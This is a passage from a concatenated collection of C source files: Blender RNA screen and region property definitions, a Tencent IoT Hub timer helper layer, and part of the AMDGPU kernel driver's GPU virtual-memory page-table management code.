RNA_def_property_ui_text(prop, "Width", "Region width"); prop = RNA_def_property(srna, "height", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winy"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Height", "Region height"); prop = RNA_def_property(srna, "view2d", PROP_POINTER, PROP_NONE); RNA_def_property_pointer_sdna(prop, NULL, "v2d"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_flag(prop, PROP_NEVER_NULL); RNA_def_property_ui_text(prop, "View2D", "2D view of the region"); prop = RNA_def_property(srna, "alignment", PROP_ENUM, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_enum_items(prop, alignment_types); RNA_def_property_enum_funcs(prop, "rna_region_alignment_get", NULL, NULL); RNA_def_property_ui_text(prop, "Alignment", "Alignment of the region within the area"); 
RNA_def_function(srna, "tag_redraw", "ED_region_tag_redraw"); } static void rna_def_screen(BlenderRNA *brna) { StructRNA *srna; PropertyRNA *prop; srna = RNA_def_struct(brna, "Screen", "ID"); RNA_def_struct_sdna(srna, "Screen"); /* it is actually bScreen but for 2.5 the dna is patched! */ RNA_def_struct_ui_text( srna, "Screen", "Screen data-block, defining the layout of areas in a window"); RNA_def_struct_ui_icon(srna, ICON_WORKSPACE); /* collections */ prop = RNA_def_property(srna, "areas", PROP_COLLECTION, PROP_NONE); RNA_def_property_collection_sdna(prop, NULL, "areabase", NULL); RNA_def_property_struct_type(prop, "Area"); RNA_def_property_ui_text(prop, "Areas", "Areas the screen is subdivided into"); /* readonly status indicators */ prop = RNA_def_property(srna, "is_animation_playing", PROP_BOOLEAN, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_boolean_funcs(prop, "rna_Screen_is_animation_playing_get", NULL); RNA_def_property_ui_text(prop, "Animation Playing", "Animation playback is active"); prop = RNA_def_property(srna, "is_temporary", PROP_BOOLEAN, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_boolean_sdna(prop, NULL, "temp", 1); RNA_def_property_ui_text(prop, "Temporary", ""); prop = RNA_def_property(srna, "show_fullscreen", PROP_BOOLEAN, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_boolean_funcs(prop, "rna_Screen_fullscreen_get", NULL); RNA_def_property_ui_text(prop, "Maximize", "An area is maximized, filling this screen"); prop = RNA_def_property(srna, "show_statusbar", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_negative_sdna(prop, NULL, "flag", SCREEN_COLLAPSE_STATUSBAR); RNA_def_property_ui_text(prop, "Show Status Bar", "Show status bar"); RNA_def_property_update(prop, 0, "rna_Screen_bar_update"); /* Define Anim Playback Areas */ prop = RNA_def_property(srna, "use_play_top_left_3d_editor", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_REGION); RNA_def_property_ui_text(prop, "Top-Left 3D Editor", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_3d_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_3D_WIN); RNA_def_property_ui_text(prop, "All 3D Viewports", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_follow", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_FOLLOW); RNA_def_property_ui_text(prop, "Follow", "Follow current frame in editors"); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_animation_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_ANIM_WIN); RNA_def_property_ui_text(prop, "Animation Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_properties_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_BUTS_WIN); RNA_def_property_ui_text(prop, "Property Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_image_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_IMAGE_WIN); 
RNA_def_property_ui_text(prop, "Image Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_sequence_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_SEQ); RNA_def_property_ui_text(prop, "Sequencer Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_node_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_NODES); RNA_def_property_ui_text(prop, "Node Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_clip_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_CLIPS); RNA_def_property_ui_text(prop, "Clip Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); } void RNA_def_screen(BlenderRNA *brna) { rna_def_screen(brna); rna_def_area(brna); rna_def_region(brna); rna_def_view2d(brna); } #endif
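/*
 * Usage sketch (illustrative only): the "region_to_view" and "view_to_region"
 * RNA functions defined above wrap the editor's 2D view transform. A C caller
 * would use the View2D helpers directly; the helper name and exact signature
 * below are assumptions for illustration, not part of this file:
 *
 *   float view_x, view_y;
 *   UI_view2d_region_to_view(&region->v2d, mouse_x, mouse_y, &view_x, &view_y);
 */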
849570.c
/* * Tencent is pleased to support the open source community by making IoT Hub available. * Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved. * Licensed under the MIT License (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://opensource.org/licenses/MIT * Unless required by applicable law or agreed to in writing, software distributed under the License is * distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, * either express or implied. See the License for the specific language governing permissions and * limitations under the License. * */ #ifdef __cplusplus extern "C" { #endif #include <time.h> #include <sys/time.h> #include "qcloud_iot_import.h" static char now_time_str[20] = {0}; bool HAL_Timer_expired(Timer *timer) { struct timeval now, res; gettimeofday(&now, NULL); timersub(&timer->end_time, &now, &res); return res.tv_sec < 0 || (res.tv_sec == 0 && res.tv_usec <= 0); } void HAL_Timer_countdown_ms(Timer *timer, unsigned int timeout_ms) { struct timeval now; gettimeofday(&now, NULL); struct timeval interval = {timeout_ms / 1000, (timeout_ms % 1000) * 1000}; timeradd(&now, &interval, &timer->end_time); } void HAL_Timer_countdown(Timer *timer, unsigned int timeout) { struct timeval now; gettimeofday(&now, NULL); struct timeval interval = {timeout, 0}; timeradd(&now, &interval, &timer->end_time); } int HAL_Timer_remain(Timer *timer) { struct timeval now, res; gettimeofday(&now, NULL); timersub(&timer->end_time, &now, &res); return (res.tv_sec < 0) ? 0 : res.tv_sec * 1000 + res.tv_usec / 1000; } void HAL_Timer_init(Timer *timer) { timer->end_time = (struct timeval) {0, 0}; } char* HAL_Timer_current(void) { struct timeval tv; gettimeofday(&tv, NULL); time_t now_time = tv.tv_sec; struct tm tm_tmp = *localtime(&now_time); strftime(now_time_str, 20, "%F %T", &tm_tmp); return now_time_str; } long HAL_Timer_current_sec(void) { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec; } #ifdef __cplusplus } #endif
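/*
 * Usage sketch (illustrative only, guarded out of the build): arm a countdown
 * with HAL_Timer_countdown_ms() and poll HAL_Timer_expired() until it fires.
 * The Timer type itself is declared in qcloud_iot_import.h.
 */
#if 0
static void example_timer_usage(void)
{
    Timer t;
    HAL_Timer_init(&t);
    HAL_Timer_countdown_ms(&t, 1500); /* expires 1.5 s from now */
    while (!HAL_Timer_expired(&t)) {
        /* HAL_Timer_remain(&t) reports the remaining time in milliseconds */
    }
}
#endif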
352972.c
/* * Copyright 2008 Advanced Micro Devices, Inc. * Copyright 2008 Red Hat Inc. * Copyright 2009 Jerome Glisse. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. * * Authors: Dave Airlie * Alex Deucher * Jerome Glisse */ #include <linux/dma-fence-array.h> #include <linux/interval_tree_generic.h> #include <linux/idr.h> #include <drm/drmP.h> #include <drm/amdgpu_drm.h> #include "amdgpu.h" #include "amdgpu_trace.h" #include "amdgpu_amdkfd.h" /* * GPUVM * GPUVM is similar to the legacy gart on older asics, however * rather than there being a single global gart table * for the entire GPU, there are multiple VM page tables active * at any given time. The VM page tables can contain a mix of * vram pages and system memory pages, and system memory pages * can be mapped as snooped (cached system pages) or unsnooped * (uncached system pages). * Each VM has an ID associated with it and there is a page table * associated with each VMID. When executing a command buffer, * the kernel tells the ring what VMID to use for that command * buffer. VMIDs are allocated dynamically as commands are submitted. * The userspace drivers maintain their own address space and the kernel * sets up their page tables accordingly when they submit their * command buffers and a VMID is assigned. * Cayman/Trinity support up to 8 active VMs at any given time; * SI supports 16. */ #define START(node) ((node)->start) #define LAST(node) ((node)->last) INTERVAL_TREE_DEFINE(struct amdgpu_bo_va_mapping, rb, uint64_t, __subtree_last, START, LAST, static, amdgpu_vm_it) #undef START #undef LAST /* Local structure.
Encapsulate some VM table update parameters to reduce * the number of function parameters */ struct amdgpu_pte_update_params { /* amdgpu device we do this update for */ struct amdgpu_device *adev; /* optional amdgpu_vm we do this update for */ struct amdgpu_vm *vm; /* address where to copy page table entries from */ uint64_t src; /* indirect buffer to fill with commands */ struct amdgpu_ib *ib; /* Function which actually does the update */ void (*func)(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags); /* The next two are used during VM update by CPU * DMA addresses to use for mapping * Kernel pointer of PD/PT BO that needs to be updated */ dma_addr_t *pages_addr; void *kptr; }; /* Helper to disable partial resident texture feature from a fence callback */ struct amdgpu_prt_cb { struct amdgpu_device *adev; struct dma_fence_cb cb; }; /** * amdgpu_vm_level_shift - return the addr shift for each level * * @adev: amdgpu_device pointer * @level: VMPT level * * Returns the number of bits the pfn needs to be right shifted for a level. */ static unsigned amdgpu_vm_level_shift(struct amdgpu_device *adev, unsigned level) { unsigned shift = 0xff; switch (level) { case AMDGPU_VM_PDB2: case AMDGPU_VM_PDB1: case AMDGPU_VM_PDB0: shift = 9 * (AMDGPU_VM_PDB0 - level) + adev->vm_manager.block_size; break; case AMDGPU_VM_PTB: shift = 0; break; default: dev_err(adev->dev, "the level%d isn't supported.\n", level); } return shift; } /** * amdgpu_vm_num_entries - return the number of entries in a PD/PT * * @adev: amdgpu_device pointer * @level: VMPT level * * Calculate the number of entries in a page directory or page table. */ static unsigned amdgpu_vm_num_entries(struct amdgpu_device *adev, unsigned level) { unsigned shift = amdgpu_vm_level_shift(adev, adev->vm_manager.root_level); if (level == adev->vm_manager.root_level) /* For the root directory */ return round_up(adev->vm_manager.max_pfn, 1 << shift) >> shift; else if (level != AMDGPU_VM_PTB) /* Everything in between */ return 512; else /* For the page tables on the leaves */ return AMDGPU_VM_PTE_COUNT(adev); } /** * amdgpu_vm_bo_size - returns the size of the BOs in bytes * * @adev: amdgpu_device pointer * @level: VMPT level * * Calculate the size of the BO for a page directory or page table in bytes. */ static unsigned amdgpu_vm_bo_size(struct amdgpu_device *adev, unsigned level) { return AMDGPU_GPU_PAGE_ALIGN(amdgpu_vm_num_entries(adev, level) * 8); } /** * amdgpu_vm_get_pd_bo - add the VM PD to a validation list * * @vm: vm providing the BOs * @validated: head of validation list * @entry: entry to add * * Add the page directory to the list of BOs to * validate for command submission. */ void amdgpu_vm_get_pd_bo(struct amdgpu_vm *vm, struct list_head *validated, struct amdgpu_bo_list_entry *entry) { entry->robj = vm->root.base.bo; entry->priority = 0; entry->tv.bo = &entry->robj->tbo; entry->tv.shared = true; entry->user_pages = NULL; list_add(&entry->tv.head, validated); } /** * amdgpu_vm_validate_pt_bos - validate the page table BOs * * @adev: amdgpu device pointer * @vm: vm providing the BOs * @validate: callback to do the validation * @param: parameter for the validation callback * * Validate the page table BOs on command submission if necessary.
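 *
 * A minimal @validate callback could look like the following sketch, which
 * mirrors the ttm_bo_validate() call used elsewhere in this file (it is an
 * illustration, not necessarily the callback the CS code installs):
 *
 *   static int validate(void *param, struct amdgpu_bo *bo)
 *   {
 *       struct ttm_operation_ctx ctx = { true, false };
 *       return ttm_bo_validate(&bo->tbo, &bo->placement, &ctx);
 *   }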
*/ int amdgpu_vm_validate_pt_bos(struct amdgpu_device *adev, struct amdgpu_vm *vm, int (*validate)(void *p, struct amdgpu_bo *bo), void *param) { struct ttm_bo_global *glob = adev->mman.bdev.glob; int r; spin_lock(&vm->status_lock); while (!list_empty(&vm->evicted)) { struct amdgpu_vm_bo_base *bo_base; struct amdgpu_bo *bo; bo_base = list_first_entry(&vm->evicted, struct amdgpu_vm_bo_base, vm_status); spin_unlock(&vm->status_lock); bo = bo_base->bo; BUG_ON(!bo); if (bo->parent) { r = validate(param, bo); if (r) return r; spin_lock(&glob->lru_lock); ttm_bo_move_to_lru_tail(&bo->tbo); if (bo->shadow) ttm_bo_move_to_lru_tail(&bo->shadow->tbo); spin_unlock(&glob->lru_lock); } if (bo->tbo.type == ttm_bo_type_kernel && vm->use_cpu_for_update) { r = amdgpu_bo_kmap(bo, NULL); if (r) return r; } spin_lock(&vm->status_lock); if (bo->tbo.type != ttm_bo_type_kernel) list_move(&bo_base->vm_status, &vm->moved); else list_move(&bo_base->vm_status, &vm->relocated); } spin_unlock(&vm->status_lock); return 0; } /** * amdgpu_vm_ready - check VM is ready for updates * * @vm: VM to check * * Check if all VM PDs/PTs are ready for updates */ bool amdgpu_vm_ready(struct amdgpu_vm *vm) { bool ready; spin_lock(&vm->status_lock); ready = list_empty(&vm->evicted); spin_unlock(&vm->status_lock); return ready; } /** * amdgpu_vm_clear_bo - initially clear the PDs/PTs * * @adev: amdgpu_device pointer * @bo: BO to clear * @level: level this BO is at * * Root PD needs to be reserved when calling this. */ static int amdgpu_vm_clear_bo(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_bo *bo, unsigned level, bool pte_support_ats) { struct ttm_operation_ctx ctx = { true, false }; struct dma_fence *fence = NULL; unsigned entries, ats_entries; struct amdgpu_ring *ring; struct amdgpu_job *job; uint64_t addr; int r; addr = amdgpu_bo_gpu_offset(bo); entries = amdgpu_bo_size(bo) / 8; if (pte_support_ats) { if (level == adev->vm_manager.root_level) { ats_entries = amdgpu_vm_level_shift(adev, level); ats_entries += AMDGPU_GPU_PAGE_SHIFT; ats_entries = AMDGPU_VA_HOLE_START >> ats_entries; ats_entries = min(ats_entries, entries); entries -= ats_entries; } else { ats_entries = entries; entries = 0; } } else { ats_entries = 0; } ring = container_of(vm->entity.sched, struct amdgpu_ring, sched); r = reservation_object_reserve_shared(bo->tbo.resv); if (r) return r; r = ttm_bo_validate(&bo->tbo, &bo->placement, &ctx); if (r) goto error; r = amdgpu_job_alloc_with_ib(adev, 64, &job); if (r) goto error; if (ats_entries) { uint64_t ats_value; ats_value = AMDGPU_PTE_DEFAULT_ATC; if (level != AMDGPU_VM_PTB) ats_value |= AMDGPU_PDE_PTE; amdgpu_vm_set_pte_pde(adev, &job->ibs[0], addr, 0, ats_entries, 0, ats_value); addr += ats_entries * 8; } if (entries) amdgpu_vm_set_pte_pde(adev, &job->ibs[0], addr, 0, entries, 0, 0); amdgpu_ring_pad_ib(ring, &job->ibs[0]); WARN_ON(job->ibs[0].length_dw > 64); r = amdgpu_sync_resv(adev, &job->sync, bo->tbo.resv, AMDGPU_FENCE_OWNER_UNDEFINED, false); if (r) goto error_free; r = amdgpu_job_submit(job, ring, &vm->entity, AMDGPU_FENCE_OWNER_UNDEFINED, &fence); if (r) goto error_free; amdgpu_bo_fence(bo, fence, true); dma_fence_put(fence); if (bo->shadow) return amdgpu_vm_clear_bo(adev, vm, bo->shadow, level, pte_support_ats); return 0; error_free: amdgpu_job_free(job); error: return r; } /** * amdgpu_vm_alloc_levels - allocate the PD/PT levels * * @adev: amdgpu_device pointer * @vm: requested vm * @saddr: start of the address range * @eaddr: end of the address range * * Make sure the page directories and 
page tables are allocated */ static int amdgpu_vm_alloc_levels(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_vm_pt *parent, uint64_t saddr, uint64_t eaddr, unsigned level, bool ats) { unsigned shift = amdgpu_vm_level_shift(adev, level); unsigned pt_idx, from, to; u64 flags; int r; if (!parent->entries) { unsigned num_entries = amdgpu_vm_num_entries(adev, level); parent->entries = kvmalloc_array(num_entries, sizeof(struct amdgpu_vm_pt), GFP_KERNEL | __GFP_ZERO); if (!parent->entries) return -ENOMEM; } from = saddr >> shift; to = eaddr >> shift; if (from >= amdgpu_vm_num_entries(adev, level) || to >= amdgpu_vm_num_entries(adev, level)) return -EINVAL; ++level; saddr = saddr & ((1 << shift) - 1); eaddr = eaddr & ((1 << shift) - 1); flags = AMDGPU_GEM_CREATE_VRAM_CONTIGUOUS; if (vm->use_cpu_for_update) flags |= AMDGPU_GEM_CREATE_CPU_ACCESS_REQUIRED; else flags |= (AMDGPU_GEM_CREATE_NO_CPU_ACCESS | AMDGPU_GEM_CREATE_SHADOW); /* walk over the address space and allocate the page tables */ for (pt_idx = from; pt_idx <= to; ++pt_idx) { struct reservation_object *resv = vm->root.base.bo->tbo.resv; struct amdgpu_vm_pt *entry = &parent->entries[pt_idx]; struct amdgpu_bo *pt; if (!entry->base.bo) { r = amdgpu_bo_create(adev, amdgpu_vm_bo_size(adev, level), AMDGPU_GPU_PAGE_SIZE, AMDGPU_GEM_DOMAIN_VRAM, flags, ttm_bo_type_kernel, resv, &pt); if (r) return r; r = amdgpu_vm_clear_bo(adev, vm, pt, level, ats); if (r) { amdgpu_bo_unref(&pt->shadow); amdgpu_bo_unref(&pt); return r; } if (vm->use_cpu_for_update) { r = amdgpu_bo_kmap(pt, NULL); if (r) { amdgpu_bo_unref(&pt->shadow); amdgpu_bo_unref(&pt); return r; } } /* Keep a reference to the root directory to avoid * freeing them up in the wrong order. */ pt->parent = amdgpu_bo_ref(parent->base.bo); entry->base.vm = vm; entry->base.bo = pt; list_add_tail(&entry->base.bo_list, &pt->va); spin_lock(&vm->status_lock); list_add(&entry->base.vm_status, &vm->relocated); spin_unlock(&vm->status_lock); } if (level < AMDGPU_VM_PTB) { uint64_t sub_saddr = (pt_idx == from) ? saddr : 0; uint64_t sub_eaddr = (pt_idx == to) ? eaddr : ((1 << shift) - 1); r = amdgpu_vm_alloc_levels(adev, vm, entry, sub_saddr, sub_eaddr, level, ats); if (r) return r; } } return 0; } /** * amdgpu_vm_alloc_pts - Allocate page tables. * * @adev: amdgpu_device pointer * @vm: VM to allocate page tables for * @saddr: Start address which needs to be allocated * @size: Size from start address we need. * * Make sure the page tables are allocated.
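 *
 * Example (sketch with illustrative values): reserving page tables for a
 * 2 MB range at VA 0x100000; saddr and size must both be GPU-page aligned,
 * as the parameter check below enforces:
 *
 *   r = amdgpu_vm_alloc_pts(adev, vm, 0x100000, 0x200000);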
*/ int amdgpu_vm_alloc_pts(struct amdgpu_device *adev, struct amdgpu_vm *vm, uint64_t saddr, uint64_t size) { uint64_t eaddr; bool ats = false; /* validate the parameters */ if (saddr & AMDGPU_GPU_PAGE_MASK || size & AMDGPU_GPU_PAGE_MASK) return -EINVAL; eaddr = saddr + size - 1; if (vm->pte_support_ats) ats = saddr < AMDGPU_VA_HOLE_START; saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; if (eaddr >= adev->vm_manager.max_pfn) { dev_err(adev->dev, "va above limit (0x%08llX >= 0x%08llX)\n", eaddr, adev->vm_manager.max_pfn); return -EINVAL; } return amdgpu_vm_alloc_levels(adev, vm, &vm->root, saddr, eaddr, adev->vm_manager.root_level, ats); } /** * amdgpu_vm_check_compute_bug - check whether asic has compute vm bug * * @adev: amdgpu_device pointer */ void amdgpu_vm_check_compute_bug(struct amdgpu_device *adev) { const struct amdgpu_ip_block *ip_block; bool has_compute_vm_bug; struct amdgpu_ring *ring; int i; has_compute_vm_bug = false; ip_block = amdgpu_device_ip_get_ip_block(adev, AMD_IP_BLOCK_TYPE_GFX); if (ip_block) { /* Compute has a VM bug for GFX version < 7. Compute has a VM bug for GFX 8 MEC firmware version < 673. */ if (ip_block->version->major <= 7) has_compute_vm_bug = true; else if (ip_block->version->major == 8) if (adev->gfx.mec_fw_version < 673) has_compute_vm_bug = true; } for (i = 0; i < adev->num_rings; i++) { ring = adev->rings[i]; if (ring->funcs->type == AMDGPU_RING_TYPE_COMPUTE) /* only compute rings */ ring->has_compute_vm_bug = has_compute_vm_bug; else ring->has_compute_vm_bug = false; } } bool amdgpu_vm_need_pipeline_sync(struct amdgpu_ring *ring, struct amdgpu_job *job) { struct amdgpu_device *adev = ring->adev; unsigned vmhub = ring->funcs->vmhub; struct amdgpu_vmid_mgr *id_mgr = &adev->vm_manager.id_mgr[vmhub]; struct amdgpu_vmid *id; bool gds_switch_needed; bool vm_flush_needed = job->vm_needs_flush || ring->has_compute_vm_bug; if (job->vmid == 0) return false; id = &id_mgr->ids[job->vmid]; gds_switch_needed = ring->funcs->emit_gds_switch && ( id->gds_base != job->gds_base || id->gds_size != job->gds_size || id->gws_base != job->gws_base || id->gws_size != job->gws_size || id->oa_base != job->oa_base || id->oa_size != job->oa_size); if (amdgpu_vmid_had_gpu_reset(adev, id)) return true; return vm_flush_needed || gds_switch_needed; } static bool amdgpu_vm_is_large_bar(struct amdgpu_device *adev) { return (adev->gmc.real_vram_size == adev->gmc.visible_vram_size); } /** * amdgpu_vm_flush - hardware flush the vm * * @ring: ring to use for flush * @job: job which carries the VM information * @need_pipe_sync: whether a pipeline sync is needed * * Emit a VM flush when it is necessary.
*/ int amdgpu_vm_flush(struct amdgpu_ring *ring, struct amdgpu_job *job, bool need_pipe_sync) { struct amdgpu_device *adev = ring->adev; unsigned vmhub = ring->funcs->vmhub; struct amdgpu_vmid_mgr *id_mgr = &adev->vm_manager.id_mgr[vmhub]; struct amdgpu_vmid *id = &id_mgr->ids[job->vmid]; bool gds_switch_needed = ring->funcs->emit_gds_switch && ( id->gds_base != job->gds_base || id->gds_size != job->gds_size || id->gws_base != job->gws_base || id->gws_size != job->gws_size || id->oa_base != job->oa_base || id->oa_size != job->oa_size); bool vm_flush_needed = job->vm_needs_flush; bool pasid_mapping_needed = id->pasid != job->pasid || !id->pasid_mapping || !dma_fence_is_signaled(id->pasid_mapping); struct dma_fence *fence = NULL; unsigned patch_offset = 0; int r; if (amdgpu_vmid_had_gpu_reset(adev, id)) { gds_switch_needed = true; vm_flush_needed = true; pasid_mapping_needed = true; } gds_switch_needed &= !!ring->funcs->emit_gds_switch; vm_flush_needed &= !!ring->funcs->emit_vm_flush; pasid_mapping_needed &= adev->gmc.gmc_funcs->emit_pasid_mapping && ring->funcs->emit_wreg; if (!vm_flush_needed && !gds_switch_needed && !need_pipe_sync) return 0; if (ring->funcs->init_cond_exec) patch_offset = amdgpu_ring_init_cond_exec(ring); if (need_pipe_sync) amdgpu_ring_emit_pipeline_sync(ring); if (vm_flush_needed) { trace_amdgpu_vm_flush(ring, job->vmid, job->vm_pd_addr); amdgpu_ring_emit_vm_flush(ring, job->vmid, job->vm_pd_addr); } if (pasid_mapping_needed) amdgpu_gmc_emit_pasid_mapping(ring, job->vmid, job->pasid); if (vm_flush_needed || pasid_mapping_needed) { r = amdgpu_fence_emit(ring, &fence); if (r) return r; } if (vm_flush_needed) { mutex_lock(&id_mgr->lock); dma_fence_put(id->last_flush); id->last_flush = dma_fence_get(fence); id->current_gpu_reset_count = atomic_read(&adev->gpu_reset_counter); mutex_unlock(&id_mgr->lock); } if (pasid_mapping_needed) { id->pasid = job->pasid; dma_fence_put(id->pasid_mapping); id->pasid_mapping = dma_fence_get(fence); } dma_fence_put(fence); if (ring->funcs->emit_gds_switch && gds_switch_needed) { id->gds_base = job->gds_base; id->gds_size = job->gds_size; id->gws_base = job->gws_base; id->gws_size = job->gws_size; id->oa_base = job->oa_base; id->oa_size = job->oa_size; amdgpu_ring_emit_gds_switch(ring, job->vmid, job->gds_base, job->gds_size, job->gws_base, job->gws_size, job->oa_base, job->oa_size); } if (ring->funcs->patch_cond_exec) amdgpu_ring_patch_cond_exec(ring, patch_offset); /* the double SWITCH_BUFFER here *cannot* be skipped by COND_EXEC */ if (ring->funcs->emit_switch_buffer) { amdgpu_ring_emit_switch_buffer(ring); amdgpu_ring_emit_switch_buffer(ring); } return 0; } /** * amdgpu_vm_bo_find - find the bo_va for a specific vm & bo * * @vm: requested vm * @bo: requested buffer object * * Find @bo inside the requested vm. * Search inside the @bo's vm list for the requested vm * Returns the found bo_va or NULL if none is found * * Object has to be reserved!
*/ struct amdgpu_bo_va *amdgpu_vm_bo_find(struct amdgpu_vm *vm, struct amdgpu_bo *bo) { struct amdgpu_bo_va *bo_va; list_for_each_entry(bo_va, &bo->va, base.bo_list) { if (bo_va->base.vm == vm) { return bo_va; } } return NULL; } /** * amdgpu_vm_do_set_ptes - helper to call the right asic function * * @params: see amdgpu_pte_update_params definition * @bo: PD/PT to update * @pe: addr of the page entry * @addr: dst addr to write into pe * @count: number of page entries to update * @incr: increase next addr by incr bytes * @flags: hw access flags * * Traces the parameters and calls the right asic functions * to setup the page table using the DMA. */ static void amdgpu_vm_do_set_ptes(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags) { pe += amdgpu_bo_gpu_offset(bo); trace_amdgpu_vm_set_ptes(pe, addr, count, incr, flags); if (count < 3) { amdgpu_vm_write_pte(params->adev, params->ib, pe, addr | flags, count, incr); } else { amdgpu_vm_set_pte_pde(params->adev, params->ib, pe, addr, count, incr, flags); } } /** * amdgpu_vm_do_copy_ptes - copy the PTEs from the GART * * @params: see amdgpu_pte_update_params definition * @bo: PD/PT to update * @pe: addr of the page entry * @addr: dst addr to write into pe * @count: number of page entries to update * @incr: increase next addr by incr bytes * @flags: hw access flags * * Traces the parameters and calls the DMA function to copy the PTEs. */ static void amdgpu_vm_do_copy_ptes(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags) { uint64_t src = (params->src + (addr >> 12) * 8); pe += amdgpu_bo_gpu_offset(bo); trace_amdgpu_vm_copy_ptes(pe, src, count); amdgpu_vm_copy_pte(params->adev, params->ib, pe, src, count); } /** * amdgpu_vm_map_gart - Resolve gart mapping of addr * * @pages_addr: optional DMA address to use for lookup * @addr: the unmapped addr * * Look up the physical address of the page that the pte resolves * to and return the pointer for the page table entry. */ static uint64_t amdgpu_vm_map_gart(const dma_addr_t *pages_addr, uint64_t addr) { uint64_t result; /* page table offset */ result = pages_addr[addr >> PAGE_SHIFT]; /* in case cpu page size != gpu page size*/ result |= addr & (~PAGE_MASK); result &= 0xFFFFFFFFFFFFF000ULL; return result; } /** * amdgpu_vm_cpu_set_ptes - helper to update page tables via CPU * * @params: see amdgpu_pte_update_params definition * @bo: PD/PT to update * @pe: kmap addr of the page entry * @addr: dst addr to write into pe * @count: number of page entries to update * @incr: increase next addr by incr bytes * @flags: hw access flags * * Write count number of PT/PD entries directly. */ static void amdgpu_vm_cpu_set_ptes(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags) { unsigned int i; uint64_t value; pe += (unsigned long)amdgpu_bo_kptr(bo); trace_amdgpu_vm_set_ptes(pe, addr, count, incr, flags); for (i = 0; i < count; i++) { value = params->pages_addr ? 
